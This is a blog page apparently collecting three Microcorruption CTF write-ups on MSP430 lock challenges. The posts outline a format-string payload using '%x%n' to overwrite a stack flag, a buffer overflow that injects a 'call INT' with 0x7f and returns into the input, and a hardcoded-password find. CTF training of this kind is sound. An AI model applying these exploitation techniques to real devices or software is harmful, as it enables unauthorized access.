Saturday, January 30, 2016

Microcorruption CTF (III)

New episode of this fun CTF! microcorruption

11 - Addis Ababa

There is no login function, everything is done in the main so we cannot smash the stack to control the execution. Our attack point is at 447C: here there is a call to printf for which we can forge a string format attack. Looking a few instructions ahead, we can see that, when calling the printf, at SP+2 there is the flag that is return by test_password_valid, so we need a way to modify it. Reading the specification of this printf, passing the "%n" token takes the argument as an address in which to write the number of characters already printed. Let's take a closer look to the stack:

  • SP+0: address of the format string (=SP+4)
  • SP+2: flag (=0x00)
  • SP+4: format string (=our input)
Here is our input:
                    SP+2 (little endian) + %x%n

When printf is called, it will print 2 characters (those of SP+2), then it will parse %x and do nothing because SP+2 is 0x00 and finally, parsing %n, it will write 2 (the number of bytes printed) in the address specified in SP+4, that is in SP+2

Read more »
Posted by at 8 comments:

Microcorruption CTF (II)

Here is a new round of pretty lock hacks! microcorruption

 6 - Whitehorse

The basic idea is the same of Cusco, we still have the same buffer overflow, but this time the function unlock_door is not present, so we have to create it: what that function did was simply to call INT passing on the stack the value 0x7f. We forge our input as follows:

           call INT (4 bytes) +  12 rand bytes + address of the beginning of the input + 0x7f00

How does this work? When the last ret is executed, the address of the beginning of the input will be poped from the stack so SP will point to 0x7f00 (007f in little endian), the PC will be set to the value that was just poped, meaning that we jump to our call instruction. Now everything is set: we have our 0x7f on the stack and we are about to call INT

Read more »
Posted by at No comments:

Microcorruption CTF (I)

Microcorruption hosts a nice reverse engineering CTF game, based on the MSP430 micro controller.

Just a note: I will write just a simple draft of the solution, which I hope will be enough to guide you through the exercises without spoiling the fun.
If a more detailed analysis is what you want let me know it in the comment section.

Ok, lets wear our "i <3 asm" T-shirt and we are ready to go!

0 - Tutorial

Just follow the instructions :)

1 - New Orleans

The lock asks for a password...looking at the assembly we can easily find the check_password procedure. We break at its beginning and inspect it a bit to find that it compares the given password to an hardcoded one (starting at location 0x2400)

Read more »
Posted by at 1 comment:
Subscribe to: Posts (Atom)